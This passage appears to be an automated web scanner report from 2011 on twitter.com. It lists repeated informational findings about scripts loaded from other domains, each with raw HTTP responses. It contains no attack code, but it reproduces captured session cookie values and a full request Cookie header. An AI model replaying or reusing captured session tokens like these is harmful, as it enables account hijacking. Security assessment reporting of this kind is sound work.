Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.424. http://twitter.com/harvardlampoon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/harvardlampoon

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/following.js?1296261409
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409
http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409
http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409
http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265997-31045-3388
ETag: "dd05aa33a38e41399f97d64b699efc32"
Last-Modified: Sat, 29 Jan 2011 01:53:17 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 19877
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/following.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.425. http://twitter.com/j_hollender previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-34363-18254
ETag: "ff41031bc88714d0c96acba56a4b58e3"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 50673
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.426. http://twitter.com/j_hollender/status/28168027493105664 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225156-94360-8357
ETag: "84873b64a606497b7403aad808e42fd4"
Last-Modified: Fri, 28 Jan 2011 14:32:36 GMT
X-Runtime: 0.05320
Content-Type: text/html; charset=utf-8
Content-Length: 13837
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiVmNzQ5Mzkz%250AMWYyM2YzMGQ1NThkYjM0NmZlNzkyMjEzZDoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--6ab2ae33865a2c4f7847c745caae0631fb3917ad; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.427. http://twitter.com/j_hollender/status/28168027493105664 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /j_hollender/status/28168027493105664 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234639-56743-37156
ETag: "589aef1f4b70bbe1c30fe41dd1dcc2eb"
Last-Modified: Fri, 28 Jan 2011 17:10:39 GMT
X-Runtime: 0.05949
Content-Type: text/html; charset=utf-8
Content-Length: 13706
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0OhVpbl9uZXdfdXNlcl9mbG93%250AMDoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6%250ADHR6X25hbWUiFENlbnRyYWwgQW1lcmljYToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--470bd21827f17e58fb320ed6b1c309e93f79096f; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.428. http://twitter.com/j_hollender/status/28168027493105664 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28168027493105664

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:19 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225019-47017-40660
ETag: "f40d96b3c19b236169916ec226be14ef"
Last-Modified: Fri, 28 Jan 2011 14:30:19 GMT
X-Runtime: 0.05160
Content-Type: text/html; charset=utf-8
Content-Length: 13838
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTY4MDI3NDkzMTA1NjY0Ogxjc3JmX2lkIiU5OTJjOGJk%250AOGYzZTA0NDA4Y2Q1Y2MwMTkzZTZhMTliZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--3734fcc51205696679bb42e413a9322e748617b9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.429. http://twitter.com/j_hollender/status/28175738595180544 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28175738595180544

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-12254-34367
ETag: "61544e0c3acbf3bd257ae209a889c048"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04377
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2ZGExNWUw%250AMGMyZWNjNjJjMzIzODFhMjU5NmZkNTkzZjoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--49158f0023a784432eb325042f2a8c5b699ba833; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.430. http://twitter.com/j_hollender/status/28175738595180544 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28175738595180544

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225151-48925-24449
ETag: "ca8cebc6f4a0a7e3923f1bc3d858670a"
Last-Modified: Fri, 28 Jan 2011 14:32:31 GMT
X-Runtime: 0.07727
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MTc1NzM4NTk1MTgwNTQ0Ogxjc3JmX2lkIiU2YjZmZGY1%250AZmY0YjVjMjU3NzZiNTA1NDU3ZmY5YTI4NzoHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI%250AM07wzC0B--56350870d76396cf1662faf7b1e3402c813c3212; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.431. http://twitter.com/j_hollender/status/28205461161377793 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/j_hollender/status/28205461161377793

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:18 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225018-25935-2577
ETag: "005ad16ba87e94e3722ccf310c3a3b93"
Last-Modified: Fri, 28 Jan 2011 14:30:18 GMT
X-Runtime: 0.04800
Content-Type: text/html; charset=utf-8
Content-Length: 13823
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjxodHRwOi8vdHdpdHRlci5jb20val9ob2xsZW5k%250AZXIvc3RhdHVzLzI4MjA1NDYxMTYxMzc3NzkzOgxjc3JmX2lkIiUyZmUyZWVl%250AMjgwOTk4NGY3OWE1Y2JiZTJlZjVkMWFmNzoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAToHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsA--8142c62a123829501cbddbd07b967c4cb31b12ef; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

